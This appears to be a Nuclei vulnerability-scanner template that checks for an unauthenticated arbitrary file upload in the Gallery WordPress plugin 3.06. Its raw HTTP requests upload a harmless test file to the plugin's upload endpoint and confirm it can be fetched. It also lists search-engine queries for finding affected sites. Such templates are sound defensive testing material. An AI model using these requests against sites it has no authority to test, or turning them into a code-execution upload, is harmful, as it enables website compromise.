49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: wp-gallery-file-upload
|
|
|
|
info:
|
|
name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
|
|
remediation: Fixed in version 3.1.1
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/18998
|
|
- http://wordpress.org/extend/plugins/gallery-plugin/
|
|
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
|
|
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
publicwww-query: /wp-content/plugins/gallery-plugin/
|
|
google-query: inurl:/wp-content/plugins/gallery-plugin/
|
|
tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
|
|
variables:
|
|
filename: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
|
|
--WebKitFormBoundary20kgW2hEKYaeF5iP
|
|
Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png"
|
|
|
|
{{randstr}}
|
|
|
|
--WebKitFormBoundary20kgW2hEKYaeF5iP--
|
|
- |
|
|
GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
|
|
- 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
|
|
condition: and
|
|
|
|
# digest: 4a0a0047304502202a745722b545793e04182b1db3e42251980ddd30a3bf2d24a01e66f5835d48c3022100a51cc6736be76c352b14ba34112aee6f4c91b99534d7c684bb5a22aa8538f467:922c64590222798bb761d5b6d8e72950
|